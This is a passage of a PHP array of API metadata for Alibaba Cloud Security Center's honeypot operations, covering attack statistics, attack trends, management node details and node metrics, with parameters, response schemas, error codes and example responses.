'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetHoneypotAttackStatistics' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '158253', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SrcIp', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The IP address of the attack source.', 'type' => 'string', 'required' => true, 'example' => '47.92.139.**'], ], [ 'name' => 'StatisticsType', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The type of attack source statistics information. Valid values:'."\n" ."\n" .'- **TOP_ATTACKED_AGENT**: the top 5 probes by number of attacks.'."\n" .'- **TOP_ATTACKED_IP**: the top 5 IP addresses by number of attacks.'."\n" .'- **ATTACK_EVENT_TYPE**: the intrusion event type.'."\n" .'- **ATTACK_HONEYPOT_TYPE**: the type of the compromised honeypot.', 'type' => 'string', 'required' => true, 'example' => 'TOP_ATTACKED_IP'], ], [ 'name' => 'StartTimeStamp', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The start time in timestamp format.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1681624877761'], ], [ 'name' => 'EndTimeStamp', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The end time in timestamp format.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1675058931215'], ], [ 'name' => 'RiskLevelList', 'in' => 'query', 'style' => 'flat', 'schema' => [ 'title' => '', 'description' => 'The list of risk levels.', 'type' => 'array', 'items' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **2**: low risk level.'."\n" .'- **3**: medium risk level.'."\n" .'- **4**: high risk level.', 'type' => 'string', 'required' => false, 'example' => '2', 'title' => ''], 'required' => false, 'example' => '', ], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Minimum value: **1**. Default value: **1**, which indicates that the first page is returned.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return on each page in a paged query. Default value: 20. If you leave this parameter empty, 20 entries are returned by default. > Specify a value for the paging parameter.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The statistics information data.', 'type' => 'object', 'properties' => [ 'StatisticsType' => ['title' => '', 'description' => 'The type of attack source statistics information. Valid values:'."\n" ."\n" .'- **TOP_ATTACKED_AGENT**: the top 5 probes by number of attacks.'."\n" .'- **TOP_ATTACKED_IP**: the top 5 IP addresses by number of attacks.'."\n" .'- **ATTACK_EVENT_TYPE**: the intrusion event type.'."\n" .'- **ATTACK_HONEYPOT_TYPE**: the type of the compromised honeypot.', 'type' => 'string', 'example' => 'TOP_ATTACKED_IP'], 'Count' => ['title' => '', 'description' => 'The number of entries returned on the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '2'], 'HoneypotAttackStatistics' => [ 'title' => '', 'description' => 'The list of statistics information.', 'type' => 'array', 'items' => [ 'description' => 'The statistics information details.', 'type' => 'object', 'properties' => [ 'StatisticsValue' => ['description' => 'The statistics value.', 'type' => 'string', 'example' => '112.168.1.**', 'title' => ''], 'StatisticsCount' => ['description' => 'The count of the statistics value.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'example' => '', ], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" ."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The response message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '3FACC60A-3FE4-5F49-9184-50730C8B****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code of the response.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Query attack event statistics information of a honeypot attack source', 'summary' => 'Queries the attack event statistics information of a honeypot attack source.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetHoneypotAttackStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"StatisticsType\\": \\"TOP_ATTACKED_IP\\",\\n \\"Count\\": 2,\\n \\"HoneypotAttackStatistics\\": [\\n {\\n \\"StatisticsValue\\": \\"112.168.1.**\\",\\n \\"StatisticsCount\\": 10\\n }\\n ]\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"3FACC60A-3FE4-5F49-9184-50730C8B****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'GetHoneypotEventTrend' => [ 'summary' => 'Obtain attack trend statistics for a single attack source.', 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SrcIp', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The source IP address of the attack.'."\n", 'type' => 'string', 'required' => true, 'example' => '10.91.254.***'], ], [ 'name' => 'StartTimeStamp', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'Start time, timestamp format.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1683516557757'], ], [ 'name' => 'EndTimeStamp', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'End time, timestamp format.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1687831329169'], ], [ 'name' => 'RiskLevelList', 'in' => 'query', 'style' => 'flat', 'schema' => [ 'title' => '', 'description' => 'The risk levels of the alert events.'."\n", 'type' => 'array', 'items' => ['description' => 'The risk levels.'."\n", 'type' => 'string', 'required' => false, 'example' => '4', 'title' => ''], 'required' => false, 'example' => '', ], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The returned result data list.', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The list of data returned. ', 'type' => 'array', 'items' => [ 'description' => 'Details of the data returned.', 'type' => 'object', 'properties' => [ 'KeyName' => ['title' => '', 'description' => 'The name of the attack.', 'type' => 'string', 'example' => 'ATTACK_EVENT'], 'Count' => ['title' => '', 'description' => 'The number of attacks that occurred.', 'type' => 'integer', 'format' => 'int32', 'example' => '5'], 'TimeStamp' => ['title' => '', 'description' => 'The timestamp when the attack event occurred.', 'type' => 'integer', 'format' => 'int64', 'example' => '1686968163644'], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '21637690-9B21-5EEC-94DB-2A732480****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": [\\n {\\n \\"KeyName\\": \\"ATTACK_EVENT\\",\\n \\"Count\\": 5,\\n \\"TimeStamp\\": 1686968163644\\n }\\n ],\\n \\"Count\\": 5,\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"21637690-9B21-5EEC-94DB-2A732480****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'Obtain the attack volume trend of honeypot attack sources', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetHoneypotEventTrend', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetHoneypotNode' => [ 'summary' => 'Retrieves the details of a specified management node.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'NodeId', 'in' => 'query', 'schema' => ['description' => 'The ID of the management node.'."\n" ."\n" .'> You can call the [ListHoneypotNode](~~ListHoneypotNode~~) operation to query the IDs of management nodes.', 'type' => 'string', 'required' => true, 'title' => '', 'example' => 'd3dd3864-4e02-4abd-8b6a-8f5f6fec4715'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" ."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The data returned.', 'type' => 'object', 'properties' => [ 'HoneypotNode' => [ 'description' => 'The details of the management node.', 'type' => 'object', 'properties' => [ 'NodeId' => ['description' => 'The ID of the management node.', 'type' => 'string', 'title' => '', 'example' => 'a7409a58-bc60-41af-9d36-080d58ae****'], 'NodeName' => ['description' => 'The name of the management node.', 'type' => 'string', 'title' => '', 'example' => 'gmmc'], 'HoneypotTotalCount' => ['description' => 'The maximum number of honeypots that can be deployed to the management node.', 'type' => 'integer', 'format' => 'int32', 'title' => '', 'example' => '10'], 'HoneypotUsedCount' => ['description' => 'The number of honeypots that are deployed to the management node.', 'type' => 'integer', 'format' => 'int32', 'title' => '', 'example' => '5'], 'ProbeTotalCount' => ['description' => 'The maximum number of probes that can be deployed for the management node.', 'type' => 'integer', 'format' => 'int32', 'title' => '', 'example' => '20'], 'ProbeUsedCount' => ['description' => 'The number of probes that are deployed for the management node.', 'type' => 'integer', 'format' => 'int32', 'title' => '', 'example' => '15'], 'TotalStatus' => ['description' => 'The status of the management node. Valid values:'."\n" ."\n" .'- **0**: preparing'."\n" ."\n" .'- **1**: normal'."\n" ."\n" .'- **2**: abnormal'."\n" ."\n" .'- **4**: starting'."\n" ."\n" .'- **5**: upgrading', 'type' => 'integer', 'format' => 'int32', 'title' => '', 'example' => '2'], 'EcsInstanceId' => ['description' => 'The ID of the instance.', 'type' => 'string', 'title' => '', 'example' => 'i-2vccskxjunf1ag6w****'], 'CreateTime' => ['description' => 'The time when the management node was created.', 'type' => 'string', 'title' => '', 'example' => '2022-12-02 17:13:43'], 'SecurityGroupProbeIpList' => [ 'title' => '', 'description' => 'An array consisting of the CIDR blocks that are allowed to access the management node.', 'type' => 'array', 'items' => ['description' => 'The CIDR block that is allowed to access the management node.', 'type' => 'string', 'example' => '10.0.0.0/24', 'title' => ''], 'example' => '', ], 'AllowHoneypotAccessInternet' => ['description' => 'Indicates whether a honeypot is allowed to access the Internet. Valid values:'."\n" ."\n" .'- **true**: The honeypot is allowed to access the Internet.'."\n" ."\n" .'- **false**: The honeypot is not allowed to access the Internet.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'NodeIp' => ['description' => 'The IP address of the management node.', 'type' => 'string', 'example' => '101.37.XX.XX', 'title' => ''], 'UpgradeAvailable' => ['description' => 'Indicates whether the management node can be upgraded. Valid values:'."\n" ."\n" .'- **true**: yes'."\n" ."\n" .'- **false**: no', 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'- **true**: The request was successful.'."\n" ."\n" .'- **false**: The request failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => '0A453658-070B-5554-B46C-867425BE4FD4', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"HoneypotNode\\": {\\n \\"NodeId\\": \\"a7409a58-bc60-41af-9d36-080d58ae****\\",\\n \\"NodeName\\": \\"gmmc\\",\\n \\"HoneypotTotalCount\\": 10,\\n \\"HoneypotUsedCount\\": 5,\\n \\"ProbeTotalCount\\": 20,\\n \\"ProbeUsedCount\\": 15,\\n \\"TotalStatus\\": 2,\\n \\"EcsInstanceId\\": \\"i-2vccskxjunf1ag6w****\\",\\n \\"CreateTime\\": \\"2022-12-02 17:13:43\\",\\n \\"SecurityGroupProbeIpList\\": [\\n \\"10.0.0.0/24\\"\\n ],\\n \\"AllowHoneypotAccessInternet\\": true,\\n \\"NodeIp\\": \\"101.37.XX.XX\\",\\n \\"UpgradeAvailable\\": true\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"0A453658-070B-5554-B46C-867425BE4FD4\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'GetHoneypotNode', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetHoneypotNode', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneypotNode', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypotnode/{#NodeId}'], ], ], ], ], ], 'GetHoneypotNodeMetricList' => [ 'summary' => 'Queries the monitoring data of management nodes to which the cloud honeypot belongs.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'list'], 'parameters' => [ [ 'name' => 'NodeId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The management node ID.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cc427e14-f257-4670-9d2b-d83bbbe7****'], ], [ 'name' => 'Express', 'in' => 'query', 'schema' => ['description' => 'The expression that is used to compute the query results in real time.'."\n" ."\n" .'> Only the groupby expression is supported. This expression is similar to the GROUP BY statement that applies to databases.'."\n", 'type' => 'string', 'required' => false, 'example' => '{"groupby":["userId","instanceId"]}', 'title' => ''], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The beginning of the time range to query. The following formats are supported:'."\n" ."\n" .'* UNIX timestamp: the number of milliseconds that have elapsed since January 1, 1970, 00:00:00 UTC'."\n" .'* Date format: YYYY-MM-DDThh:mm:ssZ'."\n" .'* The interval between the start time and the end time is less than or equal to 31 days.'."\n", 'type' => 'string', 'required' => false, 'example' => '2019-01-30 00:00:00'."\n", 'title' => ''], ], [ 'name' => 'MetricName', 'in' => 'query', 'schema' => ['description' => 'The metric that is used to monitor the cloud service.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cpu_total', 'title' => ''], ], [ 'name' => 'Period', 'in' => 'query', 'schema' => ['description' => 'The time interval. Unit: seconds. Valid values: 60, 300, and 900.'."\n", 'type' => 'string', 'required' => false, 'example' => '60', 'title' => ''], ], [ 'name' => 'Length', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page.'."\n" ."\n" .'> The maximum value of the Length parameter in a request is 1440.'."\n", 'type' => 'string', 'required' => false, 'example' => '100', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The end of the time range to query. Valid values:'."\n" ."\n" .'* UNIX timestamp: the number of milliseconds that have elapsed since January 1, 1970, 00:00:00 UTC'."\n" .'* Date format: YYYY-MM-DDThh:mm:ssZ'."\n", 'type' => 'string', 'required' => false, 'example' => '2019-01-30 00:10:00'."\n", 'title' => ''], ], [ 'name' => 'Namespace', 'in' => 'query', 'schema' => ['description' => 'The namespace of the cloud service. Format: acs_cloud service name.'."\n", 'type' => 'string', 'required' => false, 'example' => 'acs_ecs_dashboard', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult'."\n", 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The monitoring data.'."\n", 'type' => 'string', 'example' => '{'."\n" .' "code": "200",'."\n" .' "datapoints": "[{\\"timestamp\\":1698375060000,\\"instanceId\\":\\"i-bp18jn50nid83nsu****\\",\\"ip\\":\\"1.1.1.1\\",\\"userId\\":\\"132776878515****\\",\\"Minimum\\":67084.0,\\"Maximum\\":67084.0,\\"Average\\":67084.0},{\\"timestamp\\":1698375120000,\\"instanceId\\":\\"i-bp18jn50nid83nsu****\\",\\"ip\\":\\"1.1.1.1\\",\\"userId\\":\\"132776878515****\\",\\"Minimum\\":63704.0,\\"Maximum\\":63704.0,\\"Average\\":63704.0},{\\"timestamp\\":1698375180000,\\"instanceId\\":\\"i-bp18jn50nid83nsu****\\",\\"ip\\":\\"1.1.1.1\\",\\"userId\\":\\"132776878515****\\",\\"Minimum\\":67624.0,\\"Maximum\\":67624.0,\\"Average\\":67624.0},{\\"timestamp\\":1698375240000,\\"instanceId\\":\\"i-bp18jn50nid83nsu****\\",\\"ip\\":\\"1.1.1.1\\",\\"userId\\":\\"132776878515****\\",\\"Minimum\\":68432.0,\\"Maximum\\":68432.0,\\"Average\\":68432.0},{\\"timestamp\\":1698375300000,\\"instanceId\\":\\"i-bp18jn50nid83nsu****\\",\\"ip\\":\\"1.1.1.1\\",\\"userId\\":\\"132776878515****\\",\\"Minimum\\":70148.0,\\"Maximum\\":70148.0,\\"Average\\":70148.0},{\\"timestamp\\":1698375360000,\\"instanceId\\":\\"i-bp18jn50nid83nsu****\\",\\"ip\\":\\"1.1.1.1\\",\\"userId\\":\\"132776878515****\\",\\"Minimum\\":63612.0,\\"Maximum\\":63612.0,\\"Average\\":63612.0},{\\"timestamp\\":1698375420000,\\"instanceId\\":\\"i-bp18jn50nid83nsu****\\",\\"ip\\":\\"1.1.1.1\\",\\"userId\\":\\"132776878515****\\",\\"Minimum\\":68032.0,\\"Maximum\\":68032.0,\\"Average\\":68032.0},{\\"timestamp\\":1698375480000,\\"instanceId\\":\\"i-bp18jn50nid83nsu****\\",\\"ip\\":\\"1.1.1.1\\",\\"userId\\":\\"132776878515****\\",\\"Minimum\\":67400.0,\\"Maximum\\":67400.0,\\"Average\\":67400.0},{\\"timestamp\\":1698375540000,\\"instanceId\\":\\"i-bp18jn50nid83nsu****\\",\\"ip\\":\\"1.1.1.1\\",\\"userId\\":\\"132776878515****\\",\\"Minimum\\":65352.0,\\"Maximum\\":65352.0,\\"Average\\":65352.0}]",'."\n" .' "period": "60",'."\n" .' "requestId": "AFE33E4E-70A3-5BAE-AEA8-4D3BF3A75067",'."\n" .' "success": true'."\n" .'}', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '48F523DA-4C7E-5417-B872-E313E5A4****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ['errorCode' => 'NodeNotExist', 'errorMessage' => 'The control node does not exist.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": \\"{\\\\n \\\\\\"code\\\\\\": \\\\\\"200\\\\\\",\\\\n \\\\\\"datapoints\\\\\\": \\\\\\"[{\\\\\\\\\\\\\\"timestamp\\\\\\\\\\\\\\":1698375060000,\\\\\\\\\\\\\\"instanceId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"i-bp18jn50nid83nsu****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"ip\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"1.1.1.1\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"userId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"132776878515****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"Minimum\\\\\\\\\\\\\\":67084.0,\\\\\\\\\\\\\\"Maximum\\\\\\\\\\\\\\":67084.0,\\\\\\\\\\\\\\"Average\\\\\\\\\\\\\\":67084.0},{\\\\\\\\\\\\\\"timestamp\\\\\\\\\\\\\\":1698375120000,\\\\\\\\\\\\\\"instanceId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"i-bp18jn50nid83nsu****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"ip\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"1.1.1.1\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"userId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"132776878515****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"Minimum\\\\\\\\\\\\\\":63704.0,\\\\\\\\\\\\\\"Maximum\\\\\\\\\\\\\\":63704.0,\\\\\\\\\\\\\\"Average\\\\\\\\\\\\\\":63704.0},{\\\\\\\\\\\\\\"timestamp\\\\\\\\\\\\\\":1698375180000,\\\\\\\\\\\\\\"instanceId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"i-bp18jn50nid83nsu****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"ip\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"1.1.1.1\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"userId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"132776878515****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"Minimum\\\\\\\\\\\\\\":67624.0,\\\\\\\\\\\\\\"Maximum\\\\\\\\\\\\\\":67624.0,\\\\\\\\\\\\\\"Average\\\\\\\\\\\\\\":67624.0},{\\\\\\\\\\\\\\"timestamp\\\\\\\\\\\\\\":1698375240000,\\\\\\\\\\\\\\"instanceId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"i-bp18jn50nid83nsu****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"ip\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"1.1.1.1\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"userId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"132776878515****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"Minimum\\\\\\\\\\\\\\":68432.0,\\\\\\\\\\\\\\"Maximum\\\\\\\\\\\\\\":68432.0,\\\\\\\\\\\\\\"Average\\\\\\\\\\\\\\":68432.0},{\\\\\\\\\\\\\\"timestamp\\\\\\\\\\\\\\":1698375300000,\\\\\\\\\\\\\\"instanceId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"i-bp18jn50nid83nsu****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"ip\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"1.1.1.1\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"userId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"132776878515****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"Minimum\\\\\\\\\\\\\\":70148.0,\\\\\\\\\\\\\\"Maximum\\\\\\\\\\\\\\":70148.0,\\\\\\\\\\\\\\"Average\\\\\\\\\\\\\\":70148.0},{\\\\\\\\\\\\\\"timestamp\\\\\\\\\\\\\\":1698375360000,\\\\\\\\\\\\\\"instanceId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"i-bp18jn50nid83nsu****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"ip\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"1.1.1.1\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"userId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"132776878515****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"Minimum\\\\\\\\\\\\\\":63612.0,\\\\\\\\\\\\\\"Maximum\\\\\\\\\\\\\\":63612.0,\\\\\\\\\\\\\\"Average\\\\\\\\\\\\\\":63612.0},{\\\\\\\\\\\\\\"timestamp\\\\\\\\\\\\\\":1698375420000,\\\\\\\\\\\\\\"instanceId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"i-bp18jn50nid83nsu****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"ip\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"1.1.1.1\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"userId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"132776878515****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"Minimum\\\\\\\\\\\\\\":68032.0,\\\\\\\\\\\\\\"Maximum\\\\\\\\\\\\\\":68032.0,\\\\\\\\\\\\\\"Average\\\\\\\\\\\\\\":68032.0},{\\\\\\\\\\\\\\"timestamp\\\\\\\\\\\\\\":1698375480000,\\\\\\\\\\\\\\"instanceId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"i-bp18jn50nid83nsu****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"ip\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"1.1.1.1\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"userId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"132776878515****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"Minimum\\\\\\\\\\\\\\":67400.0,\\\\\\\\\\\\\\"Maximum\\\\\\\\\\\\\\":67400.0,\\\\\\\\\\\\\\"Average\\\\\\\\\\\\\\":67400.0},{\\\\\\\\\\\\\\"timestamp\\\\\\\\\\\\\\":1698375540000,\\\\\\\\\\\\\\"instanceId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"i-bp18jn50nid83nsu****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"ip\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"1.1.1.1\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"userId\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"132776878515****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"Minimum\\\\\\\\\\\\\\":65352.0,\\\\\\\\\\\\\\"Maximum\\\\\\\\\\\\\\":65352.0,\\\\\\\\\\\\\\"Average\\\\\\\\\\\\\\":65352.0}]\\\\\\",\\\\n \\\\\\"period\\\\\\": \\\\\\"60\\\\\\",\\\\n \\\\\\"requestId\\\\\\": \\\\\\"AFE33E4E-70A3-5BAE-AEA8-4D3BF3A75067\\\\\\",\\\\n \\\\\\"success\\\\\\": 